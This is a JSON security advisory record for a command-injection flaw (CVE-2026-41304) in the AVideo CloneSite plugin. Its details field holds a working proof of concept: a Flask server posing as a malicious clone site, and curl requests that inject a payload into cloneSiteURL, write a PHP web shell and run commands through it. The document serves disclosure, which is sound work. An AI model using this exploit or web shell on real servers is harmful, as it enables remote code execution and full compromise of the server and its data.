{"id":"GHSA-xr6f-h4x7-r6qp","summary":"WWBN AVideo: RCE cause by clonesite plugin","details":"Description\n\n## Summary\n\nThe `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.\n\nAn attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.\n\n## Details\n\nInside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization\n\n```php\n$objClone-\u003ecloneSiteURL = str_replace(\"'\", '', escapeshellarg($objClone-\u003ecloneSiteURL));\n```\n\nuse `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce\n\n```php\n$sqlURL = \"{$objClone-\u003ecloneSiteURL}videos/clones/{$json-\u003esqlFile}\"; \\\\116\n$cmd = \"wget -O {$sqlFile} {$sqlURL}\"; \\\\117\nexec($cmd . \" 2\u003e&1\", $output, $return_val);                 \\\\119\n```\n\nThe attack flow\n\n1. make a evil site to provide date\n\n2. add  evil url in `objects/pluginAddDataObject.json.php` \n\n3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce\n\n   \n\n## Poc\n\nmake a evil site use python like this \n\n```python\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n@app.route('/', defaults={'path': ''})\n@app.route('/\u003cpath:path\u003e')\ndef catch_all(path):\n    print(\"PATH:\", path)\n\n\n    return jsonify({\n            \"error\": False,\n            \"msg\": \"\",\n            \"url\": \"http://target-site.com/\",\n            \"key\": \"target_clone_key\",\n            \"useRsync\": 0,\n            \"videosDir\": \"/var/www/html/AVideo/videos/\",\n            \"sqlFile\": \"Clone_mysqlDump_evil123.sql\",\n            \"videoFiles\": [],\n            \"photoFiles\": []\n        })\n\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8071)\n```\n\nchange url with payload like (need admin)\n\n```shell\ncurl -b 'PHPSESSID=\u003cadmin_session\u003e'\n-X POST \"http://127.0.0.1/objects/pluginAddDataObject.json.php\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"cloneSiteURL\":\"http://127.0.0.1:8071/;echo${IFS}\\\"\u003c?=system(\\\\$_POST[1])?\u003e\\\"${IFS}\u003e1.php;/\",\n    \"cloneSiteSSHIP\":\"127.0.0.1\",\n    \"cloneSiteSSHUser\":\"1\",\n    \"cloneSiteSSHPort\":\"22\",\n    \"cloneSiteSSHPassword\":{\n        \"type\":\"encrypted\",\n        \"value\":\"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg==\"\n    },\n    \"useRsync\":true,\n    \"MaintenanceMode\":false,\n    \"myKey\":\"ba882541262f3202ee5a5ad790ae5b70\"\n}' \n#inject evil code\ncurl \"http://127.0.0.1/plugin/CloneSite/cloneClient.json.php\" #trigger rce to write 1.php\ncurl \"http://127.0.0.1/plugin/CloneSite/1.php\" \n -d '1=id'\n #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\nthis payload is to create a web shell \n\nthen access `plugin/CloneSite/cloneClient.json.php` \n\n`1.php`will be created \n\n## impact\n\n- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.\n\n- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.\n\n## Recommended Fix\n\nadd more powerful sanitization for `$objClone-\u003ecloneSiteURL`","aliases":["CVE-2026-41304"],"modified":"2026-05-05T16:26:35.382933Z","published":"2026-04-16T21:25:19Z","database_specific":{"github_reviewed_at":"2026-04-16T21:25:19Z","nvd_published_at":"2026-04-22T00:16:29Z","cwe_ids":["CWE-77","CWE-78"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-xr6f-h4x7-r6qp"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41304"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/473c609fc2defdea8b937b00e86ce88eba1f15bb"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"29.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0","29.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-xr6f-h4x7-r6qp/GHSA-xr6f-h4x7-r6qp.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}